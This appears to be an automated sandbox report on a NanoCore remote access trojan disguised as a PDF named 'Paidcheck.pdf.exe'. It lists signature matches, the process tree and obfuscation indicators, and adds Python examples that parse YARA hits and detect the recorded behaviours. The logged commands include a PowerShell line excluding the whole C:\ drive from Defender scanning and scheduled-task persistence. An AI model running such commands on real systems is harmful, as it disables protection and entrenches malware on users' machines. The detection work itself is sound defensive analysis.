Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.486430040.0000000003EBC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
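The YARA section above is a flat list of "Source ..., type ..., Matched rule ..." rows, with the memory sources named by dump file rather than by process. The following Python is an added worked example, not part of the report or of any Joe Sandbox tooling: it parses rows of that shape, learns the process-index-to-image mapping from the .unpack sources, applies it to the .sdmp sources, and picks out the hits that landed in an executable region (such as the 0x402000 region in process 0000000A, which the .unpack names show is RegAsm.exe). The field layout assumed for the .sdmp names (process index, stage, id, base address, page protection, kind) is an inference from the names on this page, not documented format; the sample rows are constructed copies of five entries above.

```python
import re
from collections import Counter, defaultdict
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: five rows in the shape of the report's YARA section.
SAMPLE_HITS = """\
Source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, author = Florian Roth
Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, author = Kevin Breen <kevin@techanarchy.net>
Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, author = Florian Roth
Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, author = Florian Roth
Source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORY | Matched rule: NanoCore date = 2014/04, author = Kevin Breen <kevin@techanarchy.net>
"""

# Windows PAGE_EXECUTE* protection values are 0x10, 0x20, 0x40 and 0x80.
PAGE_EXECUTE_MASK = 0xF0

# One row; also tolerates the flattened "UNPACKEDPEMatched rule:" form without the separator.
HIT_RE = re.compile(r"Source:\s*(?P<src>.+?),\s*type:\s*(?P<type>[A-Z]+?)\s*\|?\s*Matched rule:\s*(?P<rule>\S+)")
# <process index>.<stage>.<image name>.<address>.<n>[.raw].unpack
UNPACK_RE = re.compile(r"^(?P<idx>\d+)\.\d+\.(?P<image>.+?)\.(?P<addr>[0-9a-f]+)\.\d+(?:\.raw)?\.unpack$")
# Assumed layout: <process index>.<stage>.<id>.<base address>.<page protection>.<kind>.sdmp
SDMP_RE = re.compile(r"^(?P<idx>[0-9A-F]{8})\.[0-9A-F]{8}\.\d+\.(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.[0-9A-F]{8}\.sdmp$")
PMS_RE = re.compile(r"^Process Memory Space:\s*(?P<image>.+?)\s+PID:\s*\d+$")


@dataclass
class Hit:
    process: str              # image name, or "process#<idx>" when no .unpack row names it
    kind: str                 # "unpack", "sdmp", "pms" or "other"
    address: Optional[int]    # image/region base when the source name carries one
    protection: Optional[int] # page protection for .sdmp sources (assumed field)
    rule: str


def parse_hits(text: str) -> List[Hit]:
    rows = []
    for line in text.splitlines():
        m = HIT_RE.search(line)
        if m:
            rows.append((m.group("src").strip(), m.group("rule")))
    # First pass: the .unpack sources tell us which process index is which image.
    names = {}
    for src, _ in rows:
        u = UNPACK_RE.match(src)
        if u:
            names[int(u.group("idx"))] = u.group("image")
    hits = []
    for src, rule in rows:
        if (u := UNPACK_RE.match(src)):
            hits.append(Hit(u.group("image"), "unpack", int(u.group("addr"), 16), None, rule))
        elif (s := SDMP_RE.match(src)):
            idx = int(s.group("idx"), 16)
            hits.append(Hit(names.get(idx, f"process#{idx}"), "sdmp",
                            int(s.group("base"), 16), int(s.group("prot"), 16), rule))
        elif (p := PMS_RE.match(src)):
            hits.append(Hit(p.group("image"), "pms", None, None, rule))
        else:
            hits.append(Hit(src, "other", None, None, rule))
    return hits


def rules_by_process(hits: List[Hit]) -> dict:
    """Which rules fired, and how often, per process image."""
    out = defaultdict(Counter)
    for h in hits:
        out[h.process][h.rule] += 1
    return dict(out)


def executable_region_hits(hits: List[Hit]) -> List[Tuple[str, int, str]]:
    """Memory-dump hits in executable pages: the unpacked payload is mapped to run there."""
    return sorted({(h.process, h.address, h.rule) for h in hits
                   if h.kind == "sdmp" and h.protection is not None and h.protection & PAGE_EXECUTE_MASK})


if __name__ == "__main__":
    found = parse_hits(SAMPLE_HITS)
    for proc, counts in rules_by_process(found).items():
        print(proc, dict(counts))
    for proc, base, rule in executable_region_hits(found):
        print(f"executable region 0x{base:x} in {proc} matched {rule}")
```

Feeding the whole section through this turns 76 rows into a per-process picture: the dropper (index 0, Paidcheck.pdf.exe) carries the payload in several heap regions, while index 0000000A (RegAsm.exe) has it both in heap and, with protection 0x40, at 0x402000, i.e. in the code section of the RegAsm.exe image itself.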
Source: Paidcheck.pdf.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: explorerr.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 10.2.RegAsm.exe.400000.0.unpack, \u0023\u003dqVxXNKnhAcArgJoGGYXiyyQ\u003d\u003d.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 10.2.RegAsm.exe.400000.0.unpack, \u0023\u003dqVxXNKnhAcArgJoGGYXiyyQ\u003d\u003d.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.RegAsm.exe.400000.0.unpack, \u0023\u003dqjIje6jGWLd2EOkfZXKqBbg\u003d\u003d.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: classification engine | Classification label: mal100.troj.evad.winEXE@20/24@0/1
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | File created: C:\Program Files (x86)\DHCP Monitor
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2992:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2292:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:484:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\{bcd083ef-bf90-4541-bf76-579f377e7cee}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1036:120:WilError_01
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | File created: C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs'
Source: Paidcheck.pdf.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | File read: C:\Users\user\Desktop\Paidcheck.pdf.exe
Source: unknown | Process created: C:\Users\user\Desktop\Paidcheck.pdf.exe 'C:\Users\user\Desktop\Paidcheck.pdf.exe'
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs'
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5C0A.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe 0
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs'
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp'
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5C0A.tmp'
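The process tree above contains four behaviours that are each worth a process-creation detection on their own: a script host (wscript.exe) running a .vbs out of %TEMP%; that script host spawning PowerShell with Set-MpPreference -ExclusionPath, where the first excluded path is the whole C:\ drive and the second is the dropped explorerr.exe under the user's Start Menu; a copy of the .NET Framework tool RegAsm.exe executing from %TEMP% instead of from C:\Windows\Microsoft.NET\; and that copy registering the 'DHCP Monitor' scheduled tasks from XML files in %TEMP%. The Python below is an added example, not part of the report: it encodes those four checks as rules over a list of process-creation events. The event shape (parent, image, cmdline) and the rule names are hypothetical; the events are constructed copies of the command lines above, plus one benign conhost.exe launch that must not fire.

```python
import re
from pathlib import PureWindowsPath
from typing import Dict, List, Tuple

# Constructed events copied from the report's "Process created" rows (field names are hypothetical).
EVENTS: List[Dict[str, str]] = [
    {"parent": r"C:\Users\user\Desktop\Paidcheck.pdf.exe",
     "image": r"C:\Windows\SysWOW64\wscript.exe",
     "cmdline": r"'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs'"},
    {"parent": r"C:\Users\user\Desktop\Paidcheck.pdf.exe",
     "image": r"C:\Users\user\AppData\Local\Temp\RegAsm.exe",
     "cmdline": r"C:\Users\user\AppData\Local\Temp\RegAsm.exe"},
    {"parent": r"C:\Windows\SysWOW64\wscript.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'"},
    {"parent": r"C:\Users\user\AppData\Local\Temp\RegAsm.exe",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r"'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp'"},
    # Benign: every console process in the tree spawns conhost.exe like this.
    {"parent": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

# Directories an unprivileged user can write to.
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|Users\\Public|ProgramData)\\", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Signed .NET Framework tools often used as injection hosts; they ship only under this directory.
DOTNET_TOOLS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe"}
FRAMEWORK_DIR = "c:\\windows\\microsoft.net\\"


def image_name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def exclusion_paths(cmdline: str) -> List[str]:
    """Paths passed to -ExclusionPath: comma separated, optionally quoted, up to the next -Switch."""
    m = re.search(r"-ExclusionPath\s+(.+?)(?=\s+-\w|$)", cmdline, re.I)
    if not m:
        return []
    return [p.strip(" '\"") for p in m.group(1).split(",") if p.strip(" '\"")]


def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule, detail) pairs for every event that matches one of the four rules."""
    findings = []
    for ev in events:
        img, parent, cmd = image_name(ev["image"]), image_name(ev["parent"]), ev["cmdline"]
        if img in SCRIPT_HOSTS and USER_WRITABLE.search(cmd):
            findings.append(("script_host_from_temp", img))
        if parent in SCRIPT_HOSTS and img == "powershell.exe":
            findings.append(("script_host_spawns_powershell", img))
        if img == "powershell.exe" and re.search(r"Set-MpPreference", cmd, re.I):
            for p in exclusion_paths(cmd):
                if re.fullmatch(r"[A-Za-z]:\\?", p):          # a whole drive excluded
                    findings.append(("defender_exclusion_broad", p))
                elif USER_WRITABLE.search(p):                # exclusion on an attacker-writable path
                    findings.append(("defender_exclusion_userwritable", p))
        if img == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
            m = re.search(r"/xml\s+['\"]?([^'\"]+)", cmd, re.I)
            if m and USER_WRITABLE.search(m.group(1)):
                findings.append(("schtasks_xml_from_temp", m.group(1)))
        if img in DOTNET_TOOLS and not ev["image"].lower().startswith(FRAMEWORK_DIR):
            findings.append(("dotnet_tool_outside_framework_dir", ev["image"]))
    return findings


if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print(f"{rule}: {detail}")
```

On a live host the first rule's effect can be checked directly with `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath`; an entry of `C:\` means Defender's real-time scanning has been switched off for the whole system drive, and the exclusion survives the removal of the dropper until it is deleted with Remove-MpPreference.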
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: Paidcheck.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: Paidcheck.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Paidcheck.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: RegAsm.pdb source: dhcpmon.exe, RegAsm.exe.0.dr
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
      Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmp, RegAsm.exe, 00000011.00000002.325398042.0000000000CA2000.00000002.00020000.sdmp, dhcpmon.exe, 00000013.00000000.322931989.00000000002A2000.00000002.00020000.sdmp, dhcpmon.exe, 00000015.00000000.334603613.00000000008A2000.00000002.00020000.sdmp, RegAsm.exe.0.dr
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegAsm.exe, 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
      Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
      Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp

      Data Obfuscation:

      .NET source code contains potential unpacker
      Source: Paidcheck.pdf.exe, AddressBook.cs | .Net Code: .ctor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: explorerr.exe.0.dr, AddressBook.cs | .Net Code: .ctor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: 0.0.Paidcheck.pdf.exe.6a0000.0.unpack, AddressBook.cs | .Net Code: .ctor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: 0.2.Paidcheck.pdf.exe.6a0000.0.unpack, AddressBook.cs | .Net Code: .ctor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: 10.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 10.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: Paidcheck.pdf.exe | Static PE information: 0xC8D6E03A [Sat Oct 10 03:15:06 2076 UTC]
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF3795 push es; ret 0_2_06FF3798
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF3791 push es; ret 0_2_06FF3794
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF3785 push es; ret 0_2_06FF3790
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF3775 push es; ret 0_2_06FF3784
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF3771 push es; ret 0_2_06FF3774
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF375D push es; ret 0_2_06FF3770
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF3735 push es; ret 0_2_06FF3754
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF3735 push es; ret 0_2_06FF3770
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF3731 push es; ret 0_2_06FF3734
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF372D push es; ret 0_2_06FF3730
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF6594 push E9072621h; retf 0_2_06FF6599
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF2A70 push es; iretd 0_2_06FF2A72
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF2A35 push es; iretd 0_2_06FF2A36
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF1A22 push ss; iretd 0_2_06FF1A23
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF1A10 push ss; iretd 0_2_06FF1A17
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF29CE push es; iretd 0_2_06FF29CF
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_07B2313F push cs; iretd 0_2_07B2314F
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_07B23D3C push ds; ret 0_2_07B23D3F
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_07B23D05 push eax; ret 0_2_07B23D0D
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_007644A3 push es; retf 10_2_007644A4
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_00764469 push cs; retf 10_2_0076449E
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_00764289 push es; retf 10_2_00764294
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_0509ACFA push E801005Eh; retf 10_2_0509AD01
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_0509B114 push 8BC04589h; retf 10_2_0509B125
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_0509B161 push 8BBC4589h; retf 10_2_0509B16D
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_0509B1A8 push 8BB84589h; retf 10_2_0509B1B5
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_0509B1F1 push 8BB44589h; retf 10_2_0509B1FD
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_0509B235 push 8BB04589h; retf 10_2_0509B242
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 17_2_00CA4289 push es; retf 17_2_00CA4294
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 17_2_00CA4469 push cs; retf 17_2_00CA449E
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 17_2_00CA44A3 push es; retf 17_2_00CA44A4
      Source: 10.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
